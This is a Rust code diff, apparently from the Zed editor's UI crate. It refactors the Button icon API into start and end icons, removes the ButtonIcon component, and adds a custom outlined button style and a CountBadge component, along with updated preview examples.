full_path: "link-agent-panel".into(), + highlight_positions: Vec::new(), + }]), ) .into_any_element(), ), single_example( - "With Changes", + "With Changes (months)", container() .child( ThreadItem::new("ti-5", "Managing user and 
project settings interactions") .icon(IconName::AiClaude) - .timestamp("7:37 PM") + .timestamp("1mo") .added(10) .removed(3), ) .into_any_element(), ), + single_example( + "Worktree + Changes + Timestamp", + container() + .child( + ThreadItem::new("ti-5b", "Full metadata example") + .icon(IconName::AiClaude) + .worktrees(vec![ThreadItemWorktreeInfo { + name: "my-project".into(), + full_path: "my-project".into(), + highlight_positions: Vec::new(), + }]) + .added(42) + .removed(17) + .timestamp("3w"), + ) + .into_any_element(), + ), single_example( "Selected Item", container() .child( ThreadItem::new("ti-6", "Refine textarea interaction behavior") .icon(IconName::AiGemini) - .timestamp("3:00 PM") + .timestamp("45m") .selected(true), ) .into_any_element(), ), + single_example( + "Focused Item (Keyboard Selection)", + container() + .child( + ThreadItem::new("ti-7", "Implement keyboard navigation") + .icon(IconName::AiClaude) + .timestamp("12h") + .focused(true), + ) + .into_any_element(), + ), + single_example( + "Selected + Focused", + container() + .child( + ThreadItem::new("ti-8", "Active and keyboard-focused thread") + .icon(IconName::AiGemini) + .timestamp("2mo") + .selected(true) + .focused(true), + ) + .into_any_element(), + ), + single_example( + "Hovered with Action Slot", + container() + .child( + ThreadItem::new("ti-9", "Hover to see action button") + .icon(IconName::AiClaude) + .timestamp("6h") + .hovered(true) + .action_slot( + IconButton::new("delete", IconName::Trash) + .icon_size(IconSize::Small) + .icon_color(Color::Muted), + ), + ) + .into_any_element(), + ), + single_example( + "Search Highlight", + container() + .child( + ThreadItem::new("ti-10", "Implement keyboard navigation") + .icon(IconName::AiClaude) + .timestamp("4w") + .highlight_positions(vec![0, 1, 2, 3, 4, 5, 6, 7, 8, 9]), + ) + .into_any_element(), + ), + single_example( + "Worktree Search Highlight", + container() + .child( + ThreadItem::new("ti-11", "Search in worktree name") + 
.icon(IconName::AiClaude) + .timestamp("3mo") + .worktrees(vec![ThreadItemWorktreeInfo { + name: "my-project-name".into(), + full_path: "my-project-name".into(), + highlight_positions: vec![3, 4, 5, 6, 7, 8, 9, 10, 11], + }]), + ) + .into_any_element(), + ), ]; Some( diff --git a/crates/ui/src/components/banner.rs b/crates/ui/src/components/banner.rs index 199c72113afae37ab97c96932f5b9e805c5628bd..19795c2c7c86045572ac4a031276a6552a1d68ee 100644 --- a/crates/ui/src/components/banner.rs +++ b/crates/ui/src/components/banner.rs @@ -8,16 +8,14 @@ use gpui::{AnyElement, IntoElement, ParentElement, Styled}; /// /// ``` /// use ui::prelude::*; -/// use ui::{Banner, Button, IconName, IconPosition, IconSize, Label, Severity}; +/// use ui::{Banner, Button, Icon, IconName, IconSize, Label, Severity}; /// /// Banner::new() /// .severity(Severity::Success) /// .children([Label::new("This is a success message")]) /// .action_slot( /// Button::new("learn-more", "Learn More") -/// .icon(IconName::ArrowUpRight) -/// .icon_size(IconSize::Small) -/// .icon_position(IconPosition::End) +/// .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small)), /// ); /// ``` #[derive(IntoElement, RegisterComponent)] @@ -151,9 +149,7 @@ impl Component for Banner { .child(Label::new("This is an informational message")) .action_slot( Button::new("learn-more", "Learn More") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_position(IconPosition::End), + .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small)), ) .into_any_element(), ), diff --git a/crates/ui/src/components/button.rs b/crates/ui/src/components/button.rs index 17c216ec7b000bd9b563b3e00d4ee9979ca5287f..bcec46e59ce66a242cbd96d840e4323751541f92 100644 --- a/crates/ui/src/components/button.rs +++ b/crates/ui/src/components/button.rs @@ -1,5 +1,4 @@ mod button; -mod button_icon; mod button_like; mod button_link; mod copy_button; diff --git a/crates/ui/src/components/button/button.rs 
b/crates/ui/src/components/button/button.rs index 2ac3b9ca13123a0d9330d71e8b73d034d65faf89..a3636285999eabe1491ca004241c58669321cf5a 100644 --- a/crates/ui/src/components/button/button.rs +++ b/crates/ui/src/components/button/button.rs @@ -2,15 +2,13 @@ use crate::component_prelude::*; use gpui::{AnyElement, AnyView, DefiniteLength}; use ui_macros::RegisterComponent; -use crate::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle, IconName, IconSize, Label}; +use crate::traits::animation_ext::CommonAnimationExt; +use crate::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle, Icon, Label}; use crate::{ - Color, DynamicSpacing, ElevationIndex, IconPosition, KeyBinding, KeybindingPosition, TintColor, - prelude::*, + Color, DynamicSpacing, ElevationIndex, KeyBinding, KeybindingPosition, TintColor, prelude::*, }; -use super::button_icon::ButtonIcon; - -/// An element that creates a button with a label and an optional icon. +/// An element that creates a button with a label and optional icons. 
/// /// Common buttons: /// - Label, Icon + Label: [`Button`] (this component) @@ -42,7 +40,7 @@ use super::button_icon::ButtonIcon; /// use ui::prelude::*; /// /// Button::new("button_id", "Click me!") -/// .icon(IconName::Check) +/// .start_icon(Icon::new(IconName::Check)) /// .toggle_state(true) /// .on_click(|event, window, cx| { /// // Handle click event @@ -85,16 +83,13 @@ pub struct Button { label_size: Option, selected_label: Option, selected_label_color: Option, - icon: Option, - icon_position: Option, - icon_size: Option, - icon_color: Option, - selected_icon: Option, - selected_icon_color: Option, + start_icon: Option, + end_icon: Option, key_binding: Option, key_binding_position: KeybindingPosition, alpha: Option, truncate: bool, + loading: bool, } impl Button { @@ -112,16 +107,13 @@ impl Button { label_size: None, selected_label: None, selected_label_color: None, - icon: None, - icon_position: None, - icon_size: None, - icon_color: None, - selected_icon: None, - selected_icon_color: None, + start_icon: None, + end_icon: None, key_binding: None, key_binding_position: KeybindingPosition::default(), alpha: None, truncate: false, + loading: false, } } @@ -149,39 +141,19 @@ impl Button { self } - /// Assigns an icon to the button. - pub fn icon(mut self, icon: impl Into>) -> Self { - self.icon = icon.into(); - self - } - - /// Sets the position of the icon relative to the label. - pub fn icon_position(mut self, icon_position: impl Into>) -> Self { - self.icon_position = icon_position.into(); - self - } - - /// Specifies the size of the button's icon. - pub fn icon_size(mut self, icon_size: impl Into>) -> Self { - self.icon_size = icon_size.into(); - self - } - - /// Sets the color of the button's icon. - pub fn icon_color(mut self, icon_color: impl Into>) -> Self { - self.icon_color = icon_color.into(); - self - } - - /// Chooses an icon to display when the button is in a selected state. 
- pub fn selected_icon(mut self, icon: impl Into>) -> Self { - self.selected_icon = icon.into(); + /// Sets an icon to display at the start (left) of the button label. + /// + /// The icon's color will be overridden to `Color::Disabled` when the button is disabled. + pub fn start_icon(mut self, icon: impl Into>) -> Self { + self.start_icon = icon.into(); self } - /// Sets the icon color used when the button is in a selected state. - pub fn selected_icon_color(mut self, color: impl Into>) -> Self { - self.selected_icon_color = color.into(); + /// Sets an icon to display at the end (right) of the button label. + /// + /// The icon's color will be overridden to `Color::Disabled` when the button is disabled. + pub fn end_icon(mut self, icon: impl Into>) -> Self { + self.end_icon = icon.into(); self } @@ -214,27 +186,37 @@ impl Button { self.truncate = truncate; self } + + /// Displays a rotating loading spinner in place of the `start_icon`. + /// + /// When `loading` is `true`, any `start_icon` is ignored. and a rotating + pub fn loading(mut self, loading: bool) -> Self { + self.loading = loading; + self + } } impl Toggleable for Button { /// Sets the selected state of the button. /// - /// This method allows the selection state of the button to be specified. - /// It modifies the button's appearance to reflect its selected state. 
- /// /// # Examples /// + /// Create a toggleable button that changes appearance when selected: + /// /// ``` /// use ui::prelude::*; + /// use ui::TintColor; /// - /// Button::new("button_id", "Click me!") - /// .toggle_state(true) + /// let selected = true; + /// + /// Button::new("toggle_button", "Toggle Me") + /// .start_icon(Icon::new(IconName::Check)) + /// .toggle_state(selected) + /// .selected_style(ButtonStyle::Tinted(TintColor::Accent)) /// .on_click(|event, window, cx| { - /// // Handle click event + /// // Toggle the selected state /// }); /// ``` - /// - /// Use [`selected_style`](Button::selected_style) to change the style of the button when it is selected. fn toggle_state(mut self, selected: bool) -> Self { self.base = self.base.toggle_state(selected); self @@ -242,22 +224,20 @@ impl Toggleable for Button { } impl SelectableButton for Button { - /// Sets the style for the button when selected. + /// Sets the style for the button in a selected state. /// /// # Examples /// + /// Customize the selected appearance of a button: + /// /// ``` /// use ui::prelude::*; /// use ui::TintColor; /// - /// Button::new("button_id", "Click me!") + /// Button::new("styled_button", "Styled Button") /// .toggle_state(true) - /// .selected_style(ButtonStyle::Tinted(TintColor::Accent)) - /// .on_click(|event, window, cx| { - /// // Handle click event - /// }); + /// .selected_style(ButtonStyle::Tinted(TintColor::Accent)); /// ``` - /// This results in a button with a blue tinted background when selected. fn selected_style(mut self, style: ButtonStyle) -> Self { self.base = self.base.selected_style(style); self @@ -265,36 +245,27 @@ impl SelectableButton for Button { } impl Disableable for Button { - /// Disables the button. + /// Disables the button, preventing interaction and changing its appearance. /// - /// This method allows the button to be disabled. 
When a button is disabled, - /// it doesn't react to user interactions and its appearance is updated to reflect this. + /// When disabled, the button's icon and label will use `Color::Disabled`. /// /// # Examples /// + /// Create a disabled button: + /// /// ``` /// use ui::prelude::*; /// - /// Button::new("button_id", "Click me!") - /// .disabled(true) - /// .on_click(|event, window, cx| { - /// // Handle click event - /// }); + /// Button::new("disabled_button", "Can't Click Me") + /// .disabled(true); /// ``` - /// - /// This results in a button that is disabled and does not respond to click events. fn disabled(mut self, disabled: bool) -> Self { self.base = self.base.disabled(disabled); - self.key_binding = self - .key_binding - .take() - .map(|binding| binding.disabled(disabled)); self } } impl Clickable for Button { - /// Sets the click event handler for the button. fn on_click( mut self, handler: impl Fn(&gpui::ClickEvent, &mut Window, &mut App) + 'static, @@ -310,44 +281,35 @@ impl Clickable for Button { } impl FixedWidth for Button { - /// Sets a fixed width for the button. - /// - /// This function allows a button to have a fixed width instead of automatically growing or shrinking. /// Sets a fixed width for the button. /// /// # Examples /// + /// Create a button with a fixed width of 100 pixels: + /// /// ``` /// use ui::prelude::*; /// - /// Button::new("button_id", "Click me!") - /// .width(px(100.)) - /// .on_click(|event, window, cx| { - /// // Handle click event - /// }); + /// Button::new("fixed_width_button", "Fixed Width") + /// .width(px(100.0)); /// ``` - /// - /// This sets the button's width to be exactly 100 pixels. fn width(mut self, width: impl Into) -> Self { self.base = self.base.width(width); self } - /// Sets the button to occupy the full width of its container. + /// Makes the button take up the full width of its container. 
/// /// # Examples /// + /// Create a button that takes up the full width of its container: + /// /// ``` /// use ui::prelude::*; /// - /// Button::new("button_id", "Click me!") - /// .full_width() - /// .on_click(|event, window, cx| { - /// // Handle click event - /// }); + /// Button::new("full_width_button", "Full Width") + /// .full_width(); /// ``` - /// - /// This stretches the button to the full width of its container. fn full_width(mut self) -> Self { self.base = self.base.full_width(); self @@ -355,43 +317,34 @@ impl FixedWidth for Button { } impl ButtonCommon for Button { - /// Sets the button's id. fn id(&self) -> &ElementId { self.base.id() } - /// Sets the visual style of the button using a [`ButtonStyle`]. + /// Sets the visual style of the button. fn style(mut self, style: ButtonStyle) -> Self { self.base = self.base.style(style); self } - /// Sets the button's size using a [`ButtonSize`]. + /// Sets the size of the button. fn size(mut self, size: ButtonSize) -> Self { self.base = self.base.size(size); self } - /// Sets a tooltip for the button. - /// - /// This method allows a tooltip to be set for the button. The tooltip is a function that - /// takes a mutable references to [`Window`] and [`App`], and returns an [`AnyView`]. The - /// tooltip is displayed when the user hovers over the button. + /// Sets a tooltip that appears on hover. /// /// # Examples /// - /// ``` - /// use ui::prelude::*; - /// use ui::Tooltip; + /// Add a tooltip to a button: /// - /// Button::new("button_id", "Click me!") - /// .tooltip(Tooltip::text("This is a tooltip")) - /// .on_click(|event, window, cx| { - /// // Handle click event - /// }); /// ``` + /// use ui::{Tooltip, prelude::*}; /// - /// This will create a button with a tooltip that displays "This is a tooltip" when hovered over. 
+ /// Button::new("tooltip_button", "Hover Me") + /// .tooltip(Tooltip::text("This is a tooltip")); + /// ``` fn tooltip(mut self, tooltip: impl Fn(&mut Window, &mut App) -> AnyView + 'static) -> Self { self.base = self.base.tooltip(tooltip); self @@ -436,16 +389,22 @@ impl RenderOnce for Button { h_flex() .when(self.truncate, |this| this.min_w_0().overflow_hidden()) .gap(DynamicSpacing::Base04.rems(cx)) - .when(self.icon_position == Some(IconPosition::Start), |this| { - this.children(self.icon.map(|icon| { - ButtonIcon::new(icon) - .disabled(is_disabled) - .toggle_state(is_selected) - .selected_icon(self.selected_icon) - .selected_icon_color(self.selected_icon_color) - .size(self.icon_size) - .color(self.icon_color) - })) + .when(self.loading, |this| { + this.child( + Icon::new(IconName::LoadCircle) + .size(IconSize::Small) + .color(Color::Muted) + .with_rotate_animation(2), + ) + }) + .when(!self.loading, |this| { + this.when_some(self.start_icon, |this, icon| { + this.child(if is_disabled { + icon.color(Color::Disabled) + } else { + icon + }) + }) }) .child( h_flex() @@ -465,16 +424,12 @@ impl RenderOnce for Button { ) .children(self.key_binding), ) - .when(self.icon_position != Some(IconPosition::Start), |this| { - this.children(self.icon.map(|icon| { - ButtonIcon::new(icon) - .disabled(is_disabled) - .toggle_state(is_selected) - .selected_icon(self.selected_icon) - .selected_icon_color(self.selected_icon_color) - .size(self.icon_size) - .color(self.icon_color) - })) + .when_some(self.end_icon, |this, icon| { + this.child(if is_disabled { + icon.color(Color::Disabled) + } else { + icon + }) }), ) } @@ -585,24 +540,28 @@ impl Component for Button { "Buttons with Icons", vec![ single_example( - "Icon Start", - Button::new("icon_start", "Icon Start") - .icon(IconName::Check) - .icon_position(IconPosition::Start) + "Start Icon", + Button::new("icon_start", "Start Icon") + .start_icon(Icon::new(IconName::Check)) + .into_any_element(), + ), + single_example( + "End 
Icon", + Button::new("icon_end", "End Icon") + .end_icon(Icon::new(IconName::Check)) .into_any_element(), ), single_example( - "Icon End", - Button::new("icon_end", "Icon End") - .icon(IconName::Check) - .icon_position(IconPosition::End) + "Both Icons", + Button::new("both_icons", "Both Icons") + .start_icon(Icon::new(IconName::Check)) + .end_icon(Icon::new(IconName::ChevronDown)) .into_any_element(), ), single_example( "Icon Color", Button::new("icon_color", "Icon Color") - .icon(IconName::Check) - .icon_color(Color::Accent) + .start_icon(Icon::new(IconName::Check).color(Color::Accent)) .into_any_element(), ), ], diff --git a/crates/ui/src/components/button/button_icon.rs b/crates/ui/src/components/button/button_icon.rs deleted file mode 100644 index 510c418714575112070e64e945da3e185f37ee3e..0000000000000000000000000000000000000000 --- a/crates/ui/src/components/button/button_icon.rs +++ /dev/null @@ -1,199 +0,0 @@ -use crate::{Icon, IconName, IconSize, IconWithIndicator, Indicator, prelude::*}; -use gpui::Hsla; - -/// An icon that appears within a button. -/// -/// Can be used as either an icon alongside a label, like in [`Button`](crate::Button), -/// or as a standalone icon, like in [`IconButton`](crate::IconButton). 
-#[derive(IntoElement, RegisterComponent)] -pub(super) struct ButtonIcon { - icon: IconName, - size: IconSize, - color: Color, - disabled: bool, - selected: bool, - selected_icon: Option, - selected_icon_color: Option, - selected_style: Option, - indicator: Option, - indicator_border_color: Option, -} - -impl ButtonIcon { - pub fn new(icon: IconName) -> Self { - Self { - icon, - size: IconSize::default(), - color: Color::default(), - disabled: false, - selected: false, - selected_icon: None, - selected_icon_color: None, - selected_style: None, - indicator: None, - indicator_border_color: None, - } - } - - pub fn size(mut self, size: impl Into>) -> Self { - if let Some(size) = size.into() { - self.size = size; - } - self - } - - pub fn color(mut self, color: impl Into>) -> Self { - if let Some(color) = color.into() { - self.color = color; - } - self - } - - pub fn selected_icon(mut self, icon: impl Into>) -> Self { - self.selected_icon = icon.into(); - self - } - - pub fn selected_icon_color(mut self, color: impl Into>) -> Self { - self.selected_icon_color = color.into(); - self - } - - pub fn indicator(mut self, indicator: Indicator) -> Self { - self.indicator = Some(indicator); - self - } - - pub fn indicator_border_color(mut self, color: Option) -> Self { - self.indicator_border_color = color; - self - } -} - -impl Disableable for ButtonIcon { - fn disabled(mut self, disabled: bool) -> Self { - self.disabled = disabled; - self - } -} - -impl Toggleable for ButtonIcon { - fn toggle_state(mut self, selected: bool) -> Self { - self.selected = selected; - self - } -} - -impl SelectableButton for ButtonIcon { - fn selected_style(mut self, style: ButtonStyle) -> Self { - self.selected_style = Some(style); - self - } -} - -impl RenderOnce for ButtonIcon { - fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement { - let icon = self - .selected_icon - .filter(|_| self.selected) - .unwrap_or(self.icon); - - let icon_color = if self.disabled { - 
Color::Disabled - } else if self.selected_style.is_some() && self.selected { - self.selected_style.unwrap().into() - } else if self.selected { - self.selected_icon_color.unwrap_or(Color::Selected) - } else { - self.color - }; - - let icon = Icon::new(icon).size(self.size).color(icon_color); - - match self.indicator { - Some(indicator) => IconWithIndicator::new(icon, Some(indicator)) - .indicator_border_color(self.indicator_border_color) - .into_any_element(), - None => icon.into_any_element(), - } - } -} - -impl Component for ButtonIcon { - fn scope() -> ComponentScope { - ComponentScope::Input - } - - fn name() -> &'static str { - "ButtonIcon" - } - - fn description() -> Option<&'static str> { - Some("An icon component specifically designed for use within buttons.") - } - - fn preview(_window: &mut Window, _cx: &mut App) -> Option { - Some( - v_flex() - .gap_6() - .children(vec![ - example_group_with_title( - "Basic Usage", - vec![ - single_example( - "Default", - ButtonIcon::new(IconName::Star).into_any_element(), - ), - single_example( - "Custom Size", - ButtonIcon::new(IconName::Star) - .size(IconSize::Medium) - .into_any_element(), - ), - single_example( - "Custom Color", - ButtonIcon::new(IconName::Star) - .color(Color::Accent) - .into_any_element(), - ), - ], - ), - example_group_with_title( - "States", - vec![ - single_example( - "Selected", - ButtonIcon::new(IconName::Star) - .toggle_state(true) - .into_any_element(), - ), - single_example( - "Disabled", - ButtonIcon::new(IconName::Star) - .disabled(true) - .into_any_element(), - ), - ], - ), - example_group_with_title( - "With Indicator", - vec![ - single_example( - "Default Indicator", - ButtonIcon::new(IconName::Star) - .indicator(Indicator::dot()) - .into_any_element(), - ), - single_example( - "Custom Indicator", - ButtonIcon::new(IconName::Star) - .indicator(Indicator::dot().color(Color::Error)) - .into_any_element(), - ), - ], - ), - ]) - .into_any_element(), - ) - } -} diff --git 
a/crates/ui/src/components/button/button_like.rs b/crates/ui/src/components/button/button_like.rs index 9cb7bd85ef1dbcdf16b821d61b7fe02800b8e182..2b0fa20683cce462cb998e59be95731f7f214cec 100644 --- a/crates/ui/src/components/button/button_like.rs +++ b/crates/ui/src/components/button/button_like.rs @@ -138,6 +138,9 @@ pub enum ButtonStyle { /// A more de-emphasized version of the outlined button. OutlinedGhost, + /// Like [`ButtonStyle::Outlined`], but with a caller-provided border color. + OutlinedCustom(Hsla), + /// The default button style, used for most buttons. Has a transparent background, /// but has a background color to indicate states like hover and active. #[default] @@ -230,6 +233,12 @@ impl ButtonStyle { label_color: Color::Default.color(cx), icon_color: Color::Default.color(cx), }, + ButtonStyle::OutlinedCustom(border_color) => ButtonLikeStyles { + background: transparent_black(), + border_color, + label_color: Color::Default.color(cx), + icon_color: Color::Default.color(cx), + }, ButtonStyle::Subtle => ButtonLikeStyles { background: cx.theme().colors().ghost_element_background, border_color: transparent_black(), @@ -280,6 +289,12 @@ impl ButtonStyle { label_color: Color::Default.color(cx), icon_color: Color::Default.color(cx), }, + ButtonStyle::OutlinedCustom(border_color) => ButtonLikeStyles { + background: cx.theme().colors().ghost_element_hover, + border_color, + label_color: Color::Default.color(cx), + icon_color: Color::Default.color(cx), + }, ButtonStyle::Subtle => ButtonLikeStyles { background: cx.theme().colors().ghost_element_hover, border_color: transparent_black(), @@ -324,6 +339,12 @@ impl ButtonStyle { label_color: Color::Default.color(cx), icon_color: Color::Default.color(cx), }, + ButtonStyle::OutlinedCustom(border_color) => ButtonLikeStyles { + background: cx.theme().colors().element_active, + border_color, + label_color: Color::Default.color(cx), + icon_color: Color::Default.color(cx), + }, ButtonStyle::Transparent => 
ButtonLikeStyles { background: transparent_black(), border_color: transparent_black(), @@ -363,6 +384,12 @@ impl ButtonStyle { label_color: Color::Default.color(cx), icon_color: Color::Default.color(cx), }, + ButtonStyle::OutlinedCustom(border_color) => ButtonLikeStyles { + background: cx.theme().colors().ghost_element_background, + border_color, + label_color: Color::Default.color(cx), + icon_color: Color::Default.color(cx), + }, ButtonStyle::Transparent => ButtonLikeStyles { background: transparent_black(), border_color: cx.theme().colors().border_focused, @@ -405,6 +432,12 @@ impl ButtonStyle { label_color: Color::Default.color(cx), icon_color: Color::Default.color(cx), }, + ButtonStyle::OutlinedCustom(_) => ButtonLikeStyles { + background: cx.theme().colors().element_disabled, + border_color: cx.theme().colors().border_disabled, + label_color: Color::Default.color(cx), + icon_color: Color::Default.color(cx), + }, ButtonStyle::Transparent => ButtonLikeStyles { background: transparent_black(), border_color: transparent_black(), @@ -640,7 +673,7 @@ impl RenderOnce for ButtonLike { let is_outlined = matches!( self.style, - ButtonStyle::Outlined | ButtonStyle::OutlinedGhost + ButtonStyle::Outlined | ButtonStyle::OutlinedGhost | ButtonStyle::OutlinedCustom(_) ); self.base diff --git a/crates/ui/src/components/button/icon_button.rs b/crates/ui/src/components/button/icon_button.rs index 961176ed6cee7e55c7a51cd52719c0eef8a8f181..a103ddf169a8ba3ed9d1b6bf6055ff84858aef7d 100644 --- a/crates/ui/src/components/button/icon_button.rs +++ b/crates/ui/src/components/button/icon_button.rs @@ -1,11 +1,11 @@ use gpui::{AnyView, DefiniteLength, Hsla}; use super::button_like::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle}; -use crate::{ElevationIndex, Indicator, SelectableButton, TintColor, prelude::*}; +use crate::{ + ElevationIndex, Icon, IconWithIndicator, Indicator, SelectableButton, TintColor, prelude::*, +}; use crate::{IconName, IconSize}; -use 
super::button_icon::ButtonIcon; - /// The shape of an [`IconButton`]. #[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)] pub enum IconButtonShape { @@ -22,6 +22,7 @@ pub struct IconButton { icon_color: Color, selected_icon: Option, selected_icon_color: Option, + selected_style: Option, indicator: Option, indicator_border_color: Option, alpha: Option, @@ -37,6 +38,7 @@ impl IconButton { icon_color: Color::Default, selected_icon: None, selected_icon_color: None, + selected_style: None, indicator: None, indicator_border_color: None, alpha: None, @@ -112,6 +114,7 @@ impl Toggleable for IconButton { impl SelectableButton for IconButton { fn selected_style(mut self, style: ButtonStyle) -> Self { + self.selected_style = Some(style); self.base = self.base.selected_style(style); self } @@ -192,9 +195,25 @@ impl RenderOnce for IconButton { fn render(self, window: &mut Window, cx: &mut App) -> ButtonLike { let is_disabled = self.base.disabled; let is_selected = self.base.selected; - let selected_style = self.base.selected_style; - let color = self.icon_color.color(cx).opacity(self.alpha.unwrap_or(1.0)); + let icon = self + .selected_icon + .filter(|_| is_selected) + .unwrap_or(self.icon); + + let icon_color = if is_disabled { + Color::Disabled + } else if self.selected_style.is_some() && is_selected { + self.selected_style.unwrap().into() + } else if is_selected { + self.selected_icon_color.unwrap_or(Color::Selected) + } else { + let base_color = self.icon_color.color(cx); + Color::Custom(base_color.opacity(self.alpha.unwrap_or(1.0))) + }; + + let icon_element = Icon::new(icon).size(self.icon_size).color(icon_color); + self.base .map(|this| match self.shape { IconButtonShape::Square => { @@ -203,20 +222,12 @@ impl RenderOnce for IconButton { } IconButtonShape::Wide => this, }) - .child( - ButtonIcon::new(self.icon) - .disabled(is_disabled) - .toggle_state(is_selected) - .selected_icon(self.selected_icon) - .selected_icon_color(self.selected_icon_color) - 
.when_some(selected_style, |this, style| this.selected_style(style)) - .when_some(self.indicator, |this, indicator| { - this.indicator(indicator) - .indicator_border_color(self.indicator_border_color) - }) - .size(self.icon_size) - .color(Color::Custom(color)), - ) + .child(match self.indicator { + Some(indicator) => IconWithIndicator::new(icon_element, Some(indicator)) + .indicator_border_color(self.indicator_border_color) + .into_any_element(), + None => icon_element.into_any_element(), + }) } } diff --git a/crates/ui/src/components/callout.rs b/crates/ui/src/components/callout.rs index 24762ec1765a58259b061194ea31ed7e8721c2a0..23c820cd545adff2985a4116a6efb00c1e731693 100644 --- a/crates/ui/src/components/callout.rs +++ b/crates/ui/src/components/callout.rs @@ -295,7 +295,7 @@ impl Component for Callout { "Error details:", "• Quota exceeded for metric", "• Limit: 0", - "• Model: gemini-3-pro", + "• Model: gemini-3.1-pro", "Please retry in 26.33s.", "Additional details:", "- Request ID: abc123def456", diff --git a/crates/ui/src/components/chip.rs b/crates/ui/src/components/chip.rs index ce709fe3962f742f5208808315f3bdac09c1f513..06dc7e6afa6fa8723985913dfece4205e360511e 100644 --- a/crates/ui/src/components/chip.rs +++ b/crates/ui/src/components/chip.rs @@ -81,8 +81,7 @@ impl RenderOnce for Chip { h_flex() .when_some(self.height, |this, h| this.h(h)) - .min_w_0() - .flex_initial() + .flex_none() .px_1() .border_1() .rounded_sm() diff --git a/crates/ui/src/components/context_menu.rs b/crates/ui/src/components/context_menu.rs index f055777faa7149ec46076ea42c565b65d3a1ed68..2fcfd73b93d7c47018819fd9ec4426e9f1b38147 100644 --- a/crates/ui/src/components/context_menu.rs +++ b/crates/ui/src/components/context_menu.rs @@ -8,14 +8,12 @@ use gpui::{ Subscription, anchored, canvas, prelude::*, px, }; use menu::{SelectChild, SelectFirst, SelectLast, SelectNext, SelectParent, SelectPrevious}; -use settings::Settings; use std::{ cell::{Cell, RefCell}, collections::HashMap, 
rc::Rc, time::{Duration, Instant}, }; -use theme::ThemeSettings; #[derive(Copy, Clone, Debug, PartialEq, Eq)] enum SubmenuOpenTrigger { @@ -692,10 +690,20 @@ impl ContextMenu { } pub fn action_checked( + self, + label: impl Into, + action: Box, + checked: bool, + ) -> Self { + self.action_checked_with_disabled(label, action, checked, false) + } + + pub fn action_checked_with_disabled( mut self, label: impl Into, action: Box, checked: bool, + disabled: bool, ) -> Self { self.items.push(ContextMenuItem::Entry(ContextMenuEntry { toggle: if checked { @@ -718,7 +726,7 @@ impl ContextMenu { icon_position: IconPosition::End, icon_size: IconSize::Small, icon_color: None, - disabled: false, + disabled, documentation_aside: None, end_slot_icon: None, end_slot_title: None, @@ -2040,7 +2048,7 @@ impl ContextMenuItem { impl Render for ContextMenu { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let ui_font_size = ThemeSettings::get_global(cx).ui_font_size(cx); + let ui_font_size = theme::theme_settings(cx).ui_font_size(cx); let window_size = window.viewport_size(); let rem_size = window.rem_size(); let is_wide_window = window_size.width / rem_size > rems_from_px(800.).0; diff --git a/crates/ui/src/components/count_badge.rs b/crates/ui/src/components/count_badge.rs new file mode 100644 index 0000000000000000000000000000000000000000..c546d69e6d15b12e75ff94424b03b82f371ac94a --- /dev/null +++ b/crates/ui/src/components/count_badge.rs @@ -0,0 +1,93 @@ +use gpui::FontWeight; + +use crate::prelude::*; + +/// A small, pill-shaped badge that displays a numeric count. +/// +/// The count is capped at 99 and displayed as "99+" beyond that. 
+#[derive(IntoElement, RegisterComponent)] +pub struct CountBadge { + count: usize, +} + +impl CountBadge { + pub fn new(count: usize) -> Self { + Self { count } + } +} + +impl RenderOnce for CountBadge { + fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { + let label = if self.count > 99 { + "99+".to_string() + } else { + self.count.to_string() + }; + + let bg = cx + .theme() + .colors() + .editor_background + .blend(cx.theme().status().error.opacity(0.4)); + + h_flex() + .absolute() + .top_0() + .right_0() + .p_px() + .h_3p5() + .min_w_3p5() + .rounded_full() + .justify_center() + .text_center() + .border_1() + .border_color(cx.theme().colors().border) + .bg(bg) + .shadow_sm() + .child( + Label::new(label) + .size(LabelSize::Custom(rems_from_px(9.))) + .weight(FontWeight::MEDIUM), + ) + } +} + +impl Component for CountBadge { + fn scope() -> ComponentScope { + ComponentScope::Status + } + + fn description() -> Option<&'static str> { + Some("A small, pill-shaped badge that displays a numeric count.") + } + + fn preview(_window: &mut Window, cx: &mut App) -> Option { + let container = || { + div() + .relative() + .size_8() + .border_1() + .border_color(cx.theme().colors().border) + .bg(cx.theme().colors().background) + }; + + Some( + v_flex() + .gap_6() + .child(example_group_with_title( + "Count Badge", + vec![ + single_example( + "Basic Count", + container().child(CountBadge::new(3)).into_any_element(), + ), + single_example( + "Capped Count", + container().child(CountBadge::new(150)).into_any_element(), + ), + ], + )) + .into_any_element(), + ) + } +} diff --git a/crates/ui/src/components/data_table.rs b/crates/ui/src/components/data_table.rs index 8a40c246ca44ea9dbb25e61bb611882343ba7f94..e5a14a3ddabc0d918bfe6d6bcb077e32adeb6eb4 100644 --- a/crates/ui/src/components/data_table.rs +++ b/crates/ui/src/components/data_table.rs @@ -1,235 +1,31 @@ use std::{ops::Range, rc::Rc}; use gpui::{ - AbsoluteLength, AppContext, Context, 
DefiniteLength, DragMoveEvent, Entity, EntityId, - FocusHandle, Length, ListHorizontalSizingBehavior, ListSizingBehavior, ListState, Point, - Stateful, UniformListScrollHandle, WeakEntity, list, transparent_black, uniform_list, + DefiniteLength, Entity, EntityId, FocusHandle, Length, ListHorizontalSizingBehavior, + ListSizingBehavior, ListState, Point, Stateful, UniformListScrollHandle, WeakEntity, list, + transparent_black, uniform_list, }; use crate::{ ActiveTheme as _, AnyElement, App, Button, ButtonCommon as _, ButtonStyle, Color, Component, - ComponentScope, Div, ElementId, FixedWidth as _, FluentBuilder as _, Indicator, - InteractiveElement, IntoElement, ParentElement, Pixels, RegisterComponent, RenderOnce, - ScrollAxes, ScrollableHandle, Scrollbars, SharedString, StatefulInteractiveElement, Styled, - StyledExt as _, StyledTypography, Window, WithScrollbar, div, example_group_with_title, h_flex, - px, single_example, + ComponentScope, Context, Div, ElementId, FixedWidth as _, FluentBuilder as _, HeaderResizeInfo, + Indicator, InteractiveElement, IntoElement, ParentElement, Pixels, RedistributableColumnsState, + RegisterComponent, RenderOnce, ScrollAxes, ScrollableHandle, 